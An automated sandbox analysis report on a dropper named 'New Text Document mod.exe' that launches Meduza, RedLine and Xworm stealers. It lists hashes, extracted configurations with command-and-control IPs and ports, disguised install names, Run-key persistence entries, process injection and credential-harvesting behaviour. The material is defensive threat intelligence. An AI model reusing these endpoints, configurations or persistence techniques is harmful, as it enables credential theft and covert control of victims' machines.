meduza | cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d

Resubmissions

16-12-2024 05:27

241216-f5kx6awmh1 10

14-12-2024 20:23

14-12-2024 20:22

14-12-2024 20:13

14-12-2024 13:14

14-12-2024 13:12

12-12-2024 18:19

12-12-2024 18:16

Analysis

max time kernel
143s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
16-12-2024 05:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document mod.exe
Size

8KB
MD5

69994ff2f00eeca9335ccd502198e05b
SHA1

b13a15a5bea65b711b835ce8eccd2a699a99cead
SHA256

2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
SHA512

ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
SSDEEP

96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Score

10^/10

meduza redline xworm collection credential_access defense_evasion discovery execution infostealer persistence privilege_escalation pyinstaller rat spyware stealer trojan upx

Malware Config

Extracted

Family

meduza

193.3.19.151

Attributes

anti_dbg
true
anti_vm
true
build_name
hellres
extensions
.txt; .doc; .xlsx
grabber_max_size
4.194304e+06
port
15666
self_destruct
false

Extracted

Family

xworm

Version

5.0

45.141.26.234:7000

Mutex

2XLzSYLZvUJjDK3V

Attributes

Install_directory
%ProgramData%
install_file
Java Update (32bit).exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral4/files/0x000b000000023b95-200.dat	family_xworm
behavioral4/memory/1708-205-0x0000000000530000-0x0000000000540000-memory.dmp	family_xworm

Meduza
Meduza is a crypto wallet and info stealer written in C++.
stealer meduza

Meduza Stealer payload 8 IoCs

resource	yara_rule
behavioral4/memory/2976-19-0x0000000140000000-0x0000000140141000-memory.dmp	family_meduza
behavioral4/memory/2976-21-0x0000000140000000-0x0000000140141000-memory.dmp	family_meduza
behavioral4/files/0x0031000000023b78-23.dat	family_meduza
behavioral4/memory/2976-27-0x0000000140000000-0x0000000140141000-memory.dmp	family_meduza
behavioral4/memory/2976-16-0x0000000140000000-0x0000000140141000-memory.dmp	family_meduza
behavioral4/files/0x000a000000023b79-38.dat	family_meduza
behavioral4/files/0x000a000000023b7e-46.dat	family_meduza
behavioral4/memory/2976-63-0x0000000140000000-0x0000000140141000-memory.dmp	family_meduza

Meduza family
meduza
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral4/files/0x0008000000023cf5-2401.dat	family_redline
behavioral4/files/0x0007000000023d02-2458.dat	family_redline

Redline family
redline
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
201	5908	powershell.exe
202	5908	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
208	powershell.exe
3736	powershell.exe
700	powershell.exe
2244	powershell.exe
4704	powershell.exe
3172	powershell.exe
5908	powershell.exe
5184	powershell.exe
5908	powershell.exe
5184	powershell.exe
3984	powershell.exe
5088	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	in.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	New Text Document mod.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	frnd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	x.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	TPB-1.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2516	cmd.exe
4328	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk	x.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk	x.exe

Executes dropped EXE 31 IoCs

pid	Process
3504	frnd.exe
2976	frnd.exe
1740	hellres.exe
2136	duschno.exe
4244	resp.exe
4552	frnd1.exe
1684	zx.exe
4836	zx.exe
4532	TPB-1.exe
3168	TestExe.exe
1708	x.exe
4684	PDFReader.exe
5484	frnd1.exe
5756	frnd1.exe
5572	system32.exe
5304	system32.exe
5364	fcxcx.exe
2500	Update.exe
5692	8131.tmp.ssg.exe
6008	8DF4.tmp.zx.exe
5852	8DF4.tmp.zx.exe
5432	main.exe
6080	tmp.exe
6012	main.exe
4780	shost.exe
4856	shost.exe
3180	qhos.exe
4316	qhos.exe
5928	phost.exe
516	phost.exe
1496	in.exe

Loads dropped DLL 64 IoCs

pid	Process
4836	zx.exe
4836	zx.exe
4836	zx.exe
4836	zx.exe
4836	zx.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	frnd.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	frnd.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	frnd.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	frnd.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	frnd.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ElectronArtsCLI = "C:\\Users\\Admin\\Videos\\ElectronArts\\Bin\\ElectronArtsCLI.exe"	PDFReader.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\A88606A3563F3555514232\\A88606A3563F3555514232.exe"	Update.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\A88606A3563F3555514232\\A88606A3563F3555514232.exe"	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\A88606A3563F3555514232\\A88606A3563F3555514232.exe"	audiodg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\empyrean = "C:\\Users\\Admin\\AppData\\Roaming\\empyrean\\run.bat"	reg.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 41 IoCs

Web Service

T1102

flow	ioc
38	raw.githubusercontent.com
92	discord.com
165	discord.com
172	discord.com
174	discord.com
183	discord.com
177	discord.com
185	discord.com
197	discord.com
39	raw.githubusercontent.com
141	discord.com
156	discord.com
163	discord.com
173	discord.com
195	discord.com
116	discord.com
179	discord.com
182	discord.com
187	discord.com
189	discord.com
190	discord.com
192	discord.com
132	pastebin.com
162	discord.com
166	discord.com
171	discord.com
176	discord.com
178	discord.com
188	discord.com
184	discord.com
133	pastebin.com
155	discord.com
181	discord.com
191	discord.com
91	discord.com
94	raw.githubusercontent.com
158	discord.com
159	discord.com
170	discord.com
175	discord.com
180	discord.com

Looks up external IP address via web service 11 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
20	api.ipify.org
63	ip-api.com
88	ipapi.co
199	ip-api.com
19	api.ipify.org
89	ipapi.co
108	ipapi.co
110	ipapi.co
113	ipapi.co
142	api.ipify.org
143	api.ipify.org

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
5608	tasklist.exe
4572	tasklist.exe
5508	tasklist.exe
448	tasklist.exe
5872	tasklist.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 3504 set thread context of 2976	3504	frnd.exe	85
PID 4684 set thread context of 656	4684	PDFReader.exe	123
PID 4552 set thread context of 5756	4552	frnd1.exe	127
PID 2500 set thread context of 5144	2500	Update.exe	141
PID 2500 set thread context of 1776	2500	Update.exe	140
PID 2500 set thread context of 5180	2500	Update.exe	142

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/memory/5304-2258-0x00007FFC28170000-0x00007FFC285DE000-memory.dmp	upx
behavioral4/memory/5304-2260-0x00007FFC3F890000-0x00007FFC3F89F000-memory.dmp	upx
behavioral4/memory/5304-2259-0x00007FFC2C4B0000-0x00007FFC2C4D4000-memory.dmp	upx
behavioral4/memory/5304-2261-0x00007FFC2C490000-0x00007FFC2C4A9000-memory.dmp	upx
behavioral4/memory/5304-2262-0x00007FFC2C120000-0x00007FFC2C14D000-memory.dmp	upx
behavioral4/memory/5304-2263-0x00007FFC29770000-0x00007FFC297A4000-memory.dmp	upx
behavioral4/memory/5304-2264-0x00007FFC2B1C0000-0x00007FFC2B1D9000-memory.dmp	upx
behavioral4/memory/5304-2265-0x00007FFC3F840000-0x00007FFC3F84D000-memory.dmp	upx
behavioral4/memory/5304-2266-0x00007FFC3F0C0000-0x00007FFC3F0CD000-memory.dmp	upx
behavioral4/memory/5304-2267-0x00007FFC29740000-0x00007FFC2976E000-memory.dmp	upx
behavioral4/memory/5304-2271-0x00007FFC2C4B0000-0x00007FFC2C4D4000-memory.dmp	upx
behavioral4/memory/5304-2270-0x00007FFC29710000-0x00007FFC2973B000-memory.dmp	upx
behavioral4/memory/5304-2269-0x00007FFC29230000-0x00007FFC292EC000-memory.dmp	upx
behavioral4/memory/5304-2268-0x00007FFC28170000-0x00007FFC285DE000-memory.dmp	upx
behavioral4/memory/5304-2275-0x00007FFC296C0000-0x00007FFC29702000-memory.dmp	upx
behavioral4/memory/5304-2274-0x00007FFC3F890000-0x00007FFC3F89F000-memory.dmp	upx
behavioral4/memory/5304-2277-0x00007FFC3B7B0000-0x00007FFC3B7BA000-memory.dmp	upx
behavioral4/memory/5304-2276-0x00007FFC2C490000-0x00007FFC2C4A9000-memory.dmp	upx
behavioral4/memory/5304-2279-0x00007FFC29E20000-0x00007FFC29E3C000-memory.dmp	upx
behavioral4/memory/5304-2278-0x00007FFC2C120000-0x00007FFC2C14D000-memory.dmp	upx
behavioral4/memory/5304-2282-0x00007FFC2B1C0000-0x00007FFC2B1D9000-memory.dmp	upx
behavioral4/memory/5304-2281-0x00007FFC29200000-0x00007FFC2922E000-memory.dmp	upx
behavioral4/memory/5304-2280-0x00007FFC29770000-0x00007FFC297A4000-memory.dmp	upx
behavioral4/memory/5304-2284-0x00007FFC3F840000-0x00007FFC3F84D000-memory.dmp	upx
behavioral4/memory/5304-2283-0x00007FFC28AE0000-0x00007FFC28B98000-memory.dmp	upx
behavioral4/memory/5304-2287-0x00007FFC3F0C0000-0x00007FFC3F0CD000-memory.dmp	upx
behavioral4/memory/5304-2286-0x00007FFC27460000-0x00007FFC277D5000-memory.dmp	upx
behavioral4/memory/5304-2289-0x00007FFC291E0000-0x00007FFC291F4000-memory.dmp	upx
behavioral4/memory/5304-2288-0x00007FFC29740000-0x00007FFC2976E000-memory.dmp	upx
behavioral4/memory/5304-2290-0x00007FFC3B280000-0x00007FFC3B28B000-memory.dmp	upx
behavioral4/memory/5304-2292-0x00007FFC296C0000-0x00007FFC29702000-memory.dmp	upx
behavioral4/memory/5304-2291-0x00007FFC28CF0000-0x00007FFC28D17000-memory.dmp	upx
behavioral4/memory/5304-2293-0x00007FFC289C0000-0x00007FFC28AD8000-memory.dmp	upx
behavioral4/memory/5304-2294-0x00007FFC291C0000-0x00007FFC291DF000-memory.dmp	upx
behavioral4/memory/5304-2296-0x00007FFC27FF0000-0x00007FFC28161000-memory.dmp	upx
behavioral4/memory/5304-2295-0x00007FFC29E20000-0x00007FFC29E3C000-memory.dmp	upx
behavioral4/memory/5304-2298-0x00007FFC3B1E0000-0x00007FFC3B1EB000-memory.dmp	upx
behavioral4/memory/5304-2297-0x00007FFC29200000-0x00007FFC2922E000-memory.dmp	upx
behavioral4/memory/5304-2302-0x00007FFC2C480000-0x00007FFC2C48C000-memory.dmp	upx
behavioral4/memory/5304-2307-0x00007FFC28CD0000-0x00007FFC28CDC000-memory.dmp	upx
behavioral4/memory/5304-2306-0x00007FFC28CE0000-0x00007FFC28CEB000-memory.dmp	upx
behavioral4/memory/5304-2305-0x00007FFC2B1B0000-0x00007FFC2B1BC000-memory.dmp	upx
behavioral4/memory/5304-2304-0x00007FFC27460000-0x00007FFC277D5000-memory.dmp	upx
behavioral4/memory/5304-2301-0x00007FFC2C110000-0x00007FFC2C11B000-memory.dmp	upx
behavioral4/memory/5304-2300-0x00007FFC310B0000-0x00007FFC310BB000-memory.dmp	upx
behavioral4/memory/5304-2299-0x00007FFC28AE0000-0x00007FFC28B98000-memory.dmp	upx
behavioral4/memory/5304-2314-0x00007FFC28C90000-0x00007FFC28C9C000-memory.dmp	upx
behavioral4/memory/5304-2318-0x00007FFC291C0000-0x00007FFC291DF000-memory.dmp	upx
behavioral4/memory/5304-2317-0x00007FFC28BD0000-0x00007FFC28BDB000-memory.dmp	upx
behavioral4/memory/5304-2327-0x00007FFC289B0000-0x00007FFC289BC000-memory.dmp	upx
behavioral4/memory/5304-2330-0x00007FFC28960000-0x00007FFC2896C000-memory.dmp	upx
behavioral4/memory/5304-2329-0x00007FFC28970000-0x00007FFC28982000-memory.dmp	upx
behavioral4/memory/5304-2332-0x00007FFC28930000-0x00007FFC28940000-memory.dmp	upx
behavioral4/memory/5304-2331-0x00007FFC28940000-0x00007FFC28955000-memory.dmp	upx
behavioral4/memory/5304-2326-0x00007FFC289A0000-0x00007FFC289AD000-memory.dmp	upx
behavioral4/memory/5304-2325-0x00007FFC28BC0000-0x00007FFC28BCC000-memory.dmp	upx
behavioral4/memory/5304-2324-0x00007FFC27FF0000-0x00007FFC28161000-memory.dmp	upx
behavioral4/memory/5304-2316-0x00007FFC28C80000-0x00007FFC28C8B000-memory.dmp	upx
behavioral4/memory/5304-2315-0x00007FFC289C0000-0x00007FFC28AD8000-memory.dmp	upx
behavioral4/memory/5304-2313-0x00007FFC28CA0000-0x00007FFC28CAC000-memory.dmp	upx
behavioral4/memory/5304-2312-0x00007FFC28CB0000-0x00007FFC28CBE000-memory.dmp	upx
behavioral4/memory/5304-2311-0x00007FFC28CC0000-0x00007FFC28CCD000-memory.dmp	upx
behavioral4/memory/5304-2310-0x00007FFC28CF0000-0x00007FFC28D17000-memory.dmp	upx
behavioral4/memory/5304-2335-0x00007FFC28910000-0x00007FFC28924000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 5 IoCs

pyinstaller

resource	yara_rule
behavioral4/files/0x000a000000023b83-70.dat	pyinstaller
behavioral4/files/0x000b000000023b98-2104.dat	pyinstaller
behavioral4/files/0x0004000000000743-2752.dat	pyinstaller
behavioral4/files/0x000400000000074b-2820.dat	pyinstaller
behavioral4/files/0x000400000000074d-2947.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PDFReader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8131.tmp.ssg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TestExe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TPB-1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fcxcx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	in.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	frnd1.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 8 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3660	netsh.exe
232	cmd.exe
928	netsh.exe
1872	cmd.exe
5092	netsh.exe
2944	cmd.exe
5828	netsh.exe
2040	cmd.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	TPB-1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	TPB-1.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2808	timeout.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3408	WMIC.exe
1924	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
6004	systeminfo.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5960	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
3712	reg.exe
2492	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2976	frnd.exe
2976	frnd.exe
4532	TPB-1.exe
4532	TPB-1.exe
700	powershell.exe
700	powershell.exe
2244	powershell.exe
2244	powershell.exe
2244	powershell.exe
4704	powershell.exe
4704	powershell.exe
4704	powershell.exe
3172	powershell.exe
3172	powershell.exe
3172	powershell.exe
1708	x.exe
1708	x.exe
4552	frnd1.exe
4552	frnd1.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
5304	system32.exe
1776	svchost.exe
1776	svchost.exe
3488	Explorer.EXE
3488	Explorer.EXE
5144	msiexec.exe
5144	msiexec.exe
5144	msiexec.exe
5144	msiexec.exe
5144	msiexec.exe
5144	msiexec.exe
5144	msiexec.exe
5144	msiexec.exe
5144	msiexec.exe
5144	msiexec.exe
5144	msiexec.exe
5144	msiexec.exe
5144	msiexec.exe
5144	msiexec.exe
5144	msiexec.exe
5144	msiexec.exe
5144	msiexec.exe
5144	msiexec.exe
5180	audiodg.exe
5180	audiodg.exe
5180	audiodg.exe
5180	audiodg.exe
5180	audiodg.exe
5180	audiodg.exe
5180	audiodg.exe
5180	audiodg.exe
5180	audiodg.exe
5180	audiodg.exe
5180	audiodg.exe
5180	audiodg.exe
5180	audiodg.exe
5180	audiodg.exe
5180	audiodg.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2340	New Text Document mod.exe
Token: SeDebugPrivilege	2976	frnd.exe
Token: SeImpersonatePrivilege	2976	frnd.exe
Token: SeDebugPrivilege	1740	hellres.exe
Token: SeImpersonatePrivilege	1740	hellres.exe
Token: SeDebugPrivilege	2136	duschno.exe
Token: SeImpersonatePrivilege	2136	duschno.exe
Token: SeDebugPrivilege	4244	resp.exe
Token: SeImpersonatePrivilege	4244	resp.exe
Token: SeDebugPrivilege	4552	frnd1.exe
Token: SeDebugPrivilege	1708	x.exe
Token: SeDebugPrivilege	700	powershell.exe
Token: SeDebugPrivilege	2244	powershell.exe
Token: SeDebugPrivilege	4704	powershell.exe
Token: SeDebugPrivilege	3172	powershell.exe
Token: SeDebugPrivilege	1708	x.exe
Token: SeDebugPrivilege	656	csc.exe
Token: SeDebugPrivilege	5756	frnd1.exe
Token: SeImpersonatePrivilege	5756	frnd1.exe
Token: SeDebugPrivilege	5304	system32.exe
Token: SeIncreaseQuotaPrivilege	5496	WMIC.exe
Token: SeSecurityPrivilege	5496	WMIC.exe
Token: SeTakeOwnershipPrivilege	5496	WMIC.exe
Token: SeLoadDriverPrivilege	5496	WMIC.exe
Token: SeSystemProfilePrivilege	5496	WMIC.exe
Token: SeSystemtimePrivilege	5496	WMIC.exe
Token: SeProfSingleProcessPrivilege	5496	WMIC.exe
Token: SeIncBasePriorityPrivilege	5496	WMIC.exe
Token: SeCreatePagefilePrivilege	5496	WMIC.exe
Token: SeBackupPrivilege	5496	WMIC.exe
Token: SeRestorePrivilege	5496	WMIC.exe
Token: SeShutdownPrivilege	5496	WMIC.exe
Token: SeDebugPrivilege	5496	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5496	WMIC.exe
Token: SeRemoteShutdownPrivilege	5496	WMIC.exe
Token: SeUndockPrivilege	5496	WMIC.exe
Token: SeManageVolumePrivilege	5496	WMIC.exe
Token: 33	5496	WMIC.exe
Token: 34	5496	WMIC.exe
Token: 35	5496	WMIC.exe
Token: 36	5496	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5496	WMIC.exe
Token: SeSecurityPrivilege	5496	WMIC.exe
Token: SeTakeOwnershipPrivilege	5496	WMIC.exe
Token: SeLoadDriverPrivilege	5496	WMIC.exe
Token: SeSystemProfilePrivilege	5496	WMIC.exe
Token: SeSystemtimePrivilege	5496	WMIC.exe
Token: SeProfSingleProcessPrivilege	5496	WMIC.exe
Token: SeIncBasePriorityPrivilege	5496	WMIC.exe
Token: SeCreatePagefilePrivilege	5496	WMIC.exe
Token: SeBackupPrivilege	5496	WMIC.exe
Token: SeRestorePrivilege	5496	WMIC.exe
Token: SeShutdownPrivilege	5496	WMIC.exe
Token: SeDebugPrivilege	5496	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5496	WMIC.exe
Token: SeRemoteShutdownPrivilege	5496	WMIC.exe
Token: SeUndockPrivilege	5496	WMIC.exe
Token: SeManageVolumePrivilege	5496	WMIC.exe
Token: 33	5496	WMIC.exe
Token: 34	5496	WMIC.exe
Token: 35	5496	WMIC.exe
Token: 36	5496	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2500	Update.exe
Token: SeSecurityPrivilege	2500	Update.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1708	x.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2340 wrote to memory of 3504	2340	New Text Document mod.exe	84
PID 2340 wrote to memory of 3504	2340	New Text Document mod.exe	84
PID 3504 wrote to memory of 2976	3504	frnd.exe	85
PID 3504 wrote to memory of 2976	3504	frnd.exe	85
PID 3504 wrote to memory of 2976	3504	frnd.exe	85
PID 3504 wrote to memory of 2976	3504	frnd.exe	85
PID 3504 wrote to memory of 2976	3504	frnd.exe	85
PID 3504 wrote to memory of 2976	3504	frnd.exe	85
PID 3504 wrote to memory of 2976	3504	frnd.exe	85
PID 3504 wrote to memory of 2976	3504	frnd.exe	85
PID 3504 wrote to memory of 2976	3504	frnd.exe	85
PID 3504 wrote to memory of 2976	3504	frnd.exe	85
PID 2340 wrote to memory of 1740	2340	New Text Document mod.exe	86
PID 2340 wrote to memory of 1740	2340	New Text Document mod.exe	86
PID 2340 wrote to memory of 2136	2340	New Text Document mod.exe	87
PID 2340 wrote to memory of 2136	2340	New Text Document mod.exe	87
PID 2340 wrote to memory of 4244	2340	New Text Document mod.exe	88
PID 2340 wrote to memory of 4244	2340	New Text Document mod.exe	88
PID 2340 wrote to memory of 4552	2340	New Text Document mod.exe	97
PID 2340 wrote to memory of 4552	2340	New Text Document mod.exe	97
PID 2340 wrote to memory of 4552	2340	New Text Document mod.exe	97
PID 2340 wrote to memory of 1684	2340	New Text Document mod.exe	102
PID 2340 wrote to memory of 1684	2340	New Text Document mod.exe	102
PID 1684 wrote to memory of 4836	1684	zx.exe	103
PID 1684 wrote to memory of 4836	1684	zx.exe	103
PID 2340 wrote to memory of 4532	2340	New Text Document mod.exe	104
PID 2340 wrote to memory of 4532	2340	New Text Document mod.exe	104
PID 2340 wrote to memory of 4532	2340	New Text Document mod.exe	104
PID 2340 wrote to memory of 3168	2340	New Text Document mod.exe	106
PID 2340 wrote to memory of 3168	2340	New Text Document mod.exe	106
PID 2340 wrote to memory of 3168	2340	New Text Document mod.exe	106
PID 2340 wrote to memory of 1708	2340	New Text Document mod.exe	107
PID 2340 wrote to memory of 1708	2340	New Text Document mod.exe	107
PID 2340 wrote to memory of 4684	2340	New Text Document mod.exe	108
PID 2340 wrote to memory of 4684	2340	New Text Document mod.exe	108
PID 2340 wrote to memory of 4684	2340	New Text Document mod.exe	108
PID 1708 wrote to memory of 700	1708	x.exe	110
PID 1708 wrote to memory of 700	1708	x.exe	110
PID 4532 wrote to memory of 1884	4532	TPB-1.exe	112
PID 4532 wrote to memory of 1884	4532	TPB-1.exe	112
